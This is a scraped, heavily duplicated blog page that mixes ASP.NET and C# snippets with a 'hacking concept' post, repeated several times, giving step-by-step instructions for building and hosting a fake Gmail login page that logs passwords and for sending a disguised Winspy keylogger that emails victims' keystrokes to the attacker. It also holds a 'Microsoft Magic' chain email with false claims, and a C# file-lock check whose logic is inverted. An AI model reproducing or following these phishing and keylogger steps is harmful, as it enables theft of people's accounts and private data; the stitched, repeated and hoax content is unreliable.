<location path="Admin.aspx"> <system.web> <authorization> <allow users="Shiv"/> <deny users="*"/> </authorization> </system.web> </location> <location path="User.aspx"> <system.web> <authorization> <allow users="Shiv"/> <allow users="Raju"/> <deny users="*"/> </authorization> </system.web> </location>
ALL THING OF COMPUTER SCIENCE(DOTNET ,C#,C,SQLSERVER,OPERATING SYSTEM
Yogendra Pratap Singh
Friday 31 January 2014
We also need to define which user have access to which page. In this project we have created two pages “Admin.aspx” and “User.aspx”. “Admin.aspx” is accessible to only user “Shiv” while “Admin.aspx” and “User.aspx” is accessible to both the users.
We also need to define which user have access to which page. In this project we have created two pages “Admin.aspx” and “User.aspx”. “Admin.aspx” is accessible to only user “Shiv” while “Admin.aspx” and “User.aspx” is accessible to both the users.
<location path="Admin.aspx"> <system.web> <authorization> <allow users="Shiv"/> <deny users="*"/> </authorization> </system.web> </location> <location path="User.aspx"> <system.web> <authorization> <allow users="Shiv"/> <allow users="Raju"/> <deny users="*"/> </authorization> </system.web> </location>
Thursday 19 April 2012
hacking concept
What is:-
1.PHISHING
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
* Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
* Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
* Emails containing some Information of your Interest and asking
2.KEYLOGGING
Keyloggers definition
Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a
computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user.
Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other
information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business
purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted
to an unknown third party.
About keyloggers
A keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are
hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the
hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or
be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the
user. Keylogger is commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the
hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
There are other approaches to capturing info about what you are doing.
registry. Or a keyloggers could be which boasts these features:
*****************************************************************************************************************************
Installation Guide:
First of all Download:Gmail fake page
1.once you have downloded Gmail fake login page now extract contents in a folder
2.Now open login script(right click and then select edit) and find (CTRL+F) 'rahulhackingarticles.wetpaint.com' then change it to your to is the 'http://www.google.com.pk'
3.Note:'http://www.google.com.pk' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.pk' instead of "rahulhackingarticles.wetpaint.com"
Now Save it .
4.Create an id in www.110mb.com,www.ripway.com or t35.com.(t35 is better,as ripway suspends suspicious accounts)
Note:Lots of people have complaint that they get banned from 110mb.ripway and t35.com so as an alternative you can use ooowebhost.
5.Once you have created an account on 110mb.com ,then upload both the files in the directory
6.Now distribute http://yoursite.110mb.com/fakegmailpage.htm to your victim* once victim logins through this page you will see something.txt file,download the fileto see the password inside
(Or use sites like dot.tk to create custom links,Like http://orkutfundoo.tk which is a phishing site)
*******************************************************************************************************************************
OR CREATE YOUR OWN FAKE PAGE
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hacking.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
This will do same action
*******************************************************************************************************************************
How it works ?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked
Cheers ! you can leave your comments if you have lost your way !
Keylogging - The easy way!
The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
I have posted an article on How to use sniperspy to hack password,Which will explain you more about keyloggers,Well there are many types of keyloggers used to hack password but in this article i will use Winspy keylogger to Hack gmail passwords
First of all free download Winspy keylogger software from internet - use keyword Download Winspy Keylogger
2. After downloading winspy keylogger to hack Gmail account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password
.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Gmail account password.
1.PHISHING
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
* Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
* Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
* Emails containing some Information of your Interest and asking
2.KEYLOGGING
Keyloggers definition
Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a
computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user.
Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other
information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business
purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted
to an unknown third party.
About keyloggers
A keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are
hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the
hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or
be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the
user. Keylogger is commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the
hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
There are other approaches to capturing info about what you are doing.
- Somekeyloggerscapture screens, rather than keystrokes.
- Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
registry. Or a keyloggers could be which boasts these features:
- Stealth: invisible in process list
- Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
- ProBot program files and registry entries are hidden (Windows 2000 / XP)
- Includes Remote Deployment wizard
- Active window titles and process names logging
- Keystroke / password logging
- Regional keyboard support
- Keylogging in NT console windows
- Launched applications list
- Text snapshots of active applications.
- Visited Internet URL logger
- Capture HTTP POST data (including logins/passwords)
*****************************************************************************************************************************
- How to hack gmail account password :Phishing!
Installation Guide:
First of all Download:Gmail fake page
1.once you have downloded Gmail fake login page now extract contents in a folder
2.Now open login script(right click and then select edit) and find (CTRL+F) 'rahulhackingarticles.wetpaint.com' then change it to your to is the 'http://www.google.com.pk'
3.Note:'http://www.google.com.pk' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.pk' instead of "rahulhackingarticles.wetpaint.com"
Now Save it .
4.Create an id in www.110mb.com,www.ripway.com or t35.com.(t35 is better,as ripway suspends suspicious accounts)
Note:Lots of people have complaint that they get banned from 110mb.ripway and t35.com so as an alternative you can use ooowebhost.
5.Once you have created an account on 110mb.com ,then upload both the files in the directory
6.Now distribute http://yoursite.110mb.com/fakegmailpage.htm to your victim* once victim logins through this page you will see something.txt file,download the fileto see the password inside
(Or use sites like dot.tk to create custom links,Like http://orkutfundoo.tk which is a phishing site)
*******************************************************************************************************************************
OR CREATE YOUR OWN FAKE PAGE
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hacking.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
This will do same action
*******************************************************************************************************************************
How it works ?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked
Cheers ! you can leave your comments if you have lost your way !
Keylogging - The easy way!
The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
I have posted an article on How to use sniperspy to hack password,Which will explain you more about keyloggers,Well there are many types of keyloggers used to hack password but in this article i will use Winspy keylogger to Hack gmail passwords
First of all free download Winspy keylogger software from internet - use keyword Download Winspy Keylogger
2. After downloading winspy keylogger to hack Gmail account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password
.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Gmail account password.
hacking concept
What is:-
1.PHISHING
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
* Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
* Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
* Emails containing some Information of your Interest and asking
2.KEYLOGGING
Keyloggers definition
Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a
computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user.
Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other
information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business
purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted
to an unknown third party.
About keyloggers
A keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are
hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the
hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or
be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the
user. Keylogger is commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the
hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
There are other approaches to capturing info about what you are doing.
registry. Or a keyloggers could be which boasts these features:
*****************************************************************************************************************************
Installation Guide:
First of all Download:Gmail fake page
1.once you have downloded Gmail fake login page now extract contents in a folder
2.Now open login script(right click and then select edit) and find (CTRL+F) 'rahulhackingarticles.wetpaint.com' then change it to your to is the 'http://www.google.com.pk'
3.Note:'http://www.google.com.pk' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.pk' instead of "rahulhackingarticles.wetpaint.com"
Now Save it .
4.Create an id in www.110mb.com,www.ripway.com or t35.com.(t35 is better,as ripway suspends suspicious accounts)
Note:Lots of people have complaint that they get banned from 110mb.ripway and t35.com so as an alternative you can use ooowebhost.
5.Once you have created an account on 110mb.com ,then upload both the files in the directory
6.Now distribute http://yoursite.110mb.com/fakegmailpage.htm to your victim* once victim logins through this page you will see something.txt file,download the fileto see the password inside
(Or use sites like dot.tk to create custom links,Like http://orkutfundoo.tk which is a phishing site)
*******************************************************************************************************************************
OR CREATE YOUR OWN FAKE PAGE
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hacking.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
This will do same action
*******************************************************************************************************************************
How it works ?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked
Cheers ! you can leave your comments if you have lost your way !
Keylogging - The easy way!
The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
I have posted an article on How to use sniperspy to hack password,Which will explain you more about keyloggers,Well there are many types of keyloggers used to hack password but in this article i will use Winspy keylogger to Hack gmail passwords
First of all free download Winspy keylogger software from internet - use keyword Download Winspy Keylogger
2. After downloading winspy keylogger to hack Gmail account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password
.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Gmail account password.
1.PHISHING
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
* Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
* Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
* Emails containing some Information of your Interest and asking
2.KEYLOGGING
Keyloggers definition
Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a
computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user.
Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other
information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business
purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted
to an unknown third party.
About keyloggers
A keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are
hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the
hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or
be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the
user. Keylogger is commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the
hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
There are other approaches to capturing info about what you are doing.
- Somekeyloggerscapture screens, rather than keystrokes.
- Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
registry. Or a keyloggers could be which boasts these features:
- Stealth: invisible in process list
- Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
- ProBot program files and registry entries are hidden (Windows 2000 / XP)
- Includes Remote Deployment wizard
- Active window titles and process names logging
- Keystroke / password logging
- Regional keyboard support
- Keylogging in NT console windows
- Launched applications list
- Text snapshots of active applications.
- Visited Internet URL logger
- Capture HTTP POST data (including logins/passwords)
*****************************************************************************************************************************
- How to hack gmail account password :Phishing!
Installation Guide:
First of all Download:Gmail fake page
1.once you have downloded Gmail fake login page now extract contents in a folder
2.Now open login script(right click and then select edit) and find (CTRL+F) 'rahulhackingarticles.wetpaint.com' then change it to your to is the 'http://www.google.com.pk'
3.Note:'http://www.google.com.pk' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.pk' instead of "rahulhackingarticles.wetpaint.com"
Now Save it .
4.Create an id in www.110mb.com,www.ripway.com or t35.com.(t35 is better,as ripway suspends suspicious accounts)
Note:Lots of people have complaint that they get banned from 110mb.ripway and t35.com so as an alternative you can use ooowebhost.
5.Once you have created an account on 110mb.com ,then upload both the files in the directory
6.Now distribute http://yoursite.110mb.com/fakegmailpage.htm to your victim* once victim logins through this page you will see something.txt file,download the fileto see the password inside
(Or use sites like dot.tk to create custom links,Like http://orkutfundoo.tk which is a phishing site)
*******************************************************************************************************************************
OR CREATE YOUR OWN FAKE PAGE
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hacking.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
This will do same action
*******************************************************************************************************************************
How it works ?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked
Cheers ! you can leave your comments if you have lost your way !
Keylogging - The easy way!
The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
I have posted an article on How to use sniperspy to hack password,Which will explain you more about keyloggers,Well there are many types of keyloggers used to hack password but in this article i will use Winspy keylogger to Hack gmail passwords
First of all free download Winspy keylogger software from internet - use keyword Download Winspy Keylogger
2. After downloading winspy keylogger to hack Gmail account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password
.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Gmail account password.
Subject: Microsoft Magic
MAGIC #1
An Indian discovered that nobody can create a FOLDER anywhere on the computer which can be named as "CON". This is something pretty cool…and unbelievable… At Microsoft the whole Team, couldn't answer why this happened!
TRY IT NOW ,IT WILL NOT CREATE "CON" FOLDER
MAGIC #2
For those of you using Windows, do the following:
1) Open an empty notepad file
2) Type "Bush hid the facts" (without the quotes)
3) Save it as whatever you want..
4) Close it, and re-open it.
Is it just a really weird bug? At Microsoft they say they don't know why this happens.
MAGIC #3
Microsoft's crazy facts
This is something pretty cool and neat…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian.. Try it out yourself….
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER then see the magic…….
Hello Friend’s
In this article I am going to explain how to add progress bar in windows application.
In web application, we have much option and having third party controls too. Like
RadControls , NetAdvantages controls etc.. But in windows application, there is no straight way to add progress bar as per my thinking. In this article I am going to give one small example so you can implement into your application.
First Make one application and in one Form put below controls.
1.) Button (on clicking button we display progress Bar)
2.) Picture box (option to display Loading Image)
3.) Label (give appropriate message to user like Please wait….)
public partial class KetanProgressBar : Form{private BackgroundWorker bgworker;delegate void SetControlValueCallback(Control oControl, string propName, object propValue);public KetanProgressBar(){InitializeComponent();}private void Form1_Load(object sender, EventArgs e){bgworker = new BackgroundWorker();bgworker.WorkerSupportsCancellation = true;bgworker.WorkerReportsProgress = true;bgworker.DoWork += bwMC_DoWork;bgworker.ProgressChanged += bwMC_ProgressChanged;bgworker.RunWorkerCompleted += bwMC_RunWorkerCompleted;}private void bwMC_ProgressChanged(object sender, ProgressChangedEventArgs e){SetControlPropertyValue(pictureBox1, "Visible", true);SetControlPropertyValue(lblWait, "Visible", true);}private void bwMC_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e){if(!e.Cancelled){SetControlPropertyValue(lblWait, "Visible", false);SetControlPropertyValue(pictureBox1, "Visible", false);MessageBox.Show("Action Completed", "Confirmation", MessageBoxButtons.OK, MessageBoxIcon.Information);}}private void SetControlPropertyValue(Control oControl, string propName, object propValue){if (oControl.InvokeRequired){SetControlValueCallback d = new SetControlValueCallback(SetControlPropertyValue);oControl.Invoke(d, new object[] { oControl, propName, propValue });}else{Type t = oControl.GetType();PropertyInfo[] props = t.GetProperties();foreach (PropertyInfo p in props){if (p.Name.ToUpper() == propName.ToUpper()){p.SetValue(oControl, propValue, null);}}}}private void bwMC_DoWork(object sender, DoWorkEventArgs e){bgworker.ReportProgress(1); //just for test we make looping so progressbar will display.for (int i = 0; i <= 100000000; i++){ }}private void button1_Click(object sender, EventArgs e){bgworker.RunWorkerAsync();Application.DoEvents();}
How to check For File Lock (File in use) in C#?
public void OperationWithFile()
{
string filepath = "D:\\Test.xlsm";
if(FileInUse(filepath) == false)
MessageBox.Show("You can't operform operation. File already in Use");
}
private bool FileInUse(string path)
{
try
{
//if file is not lock then below statement will successfully executed otherwise it's goes to catch.
using (FileStream fs = new FileStream(path, FileMode.OpenOrCreate))
{
}
return false;
}
catch (IOException ex)
{
return true;
}
}
Subscribe to:
Posts (Atom)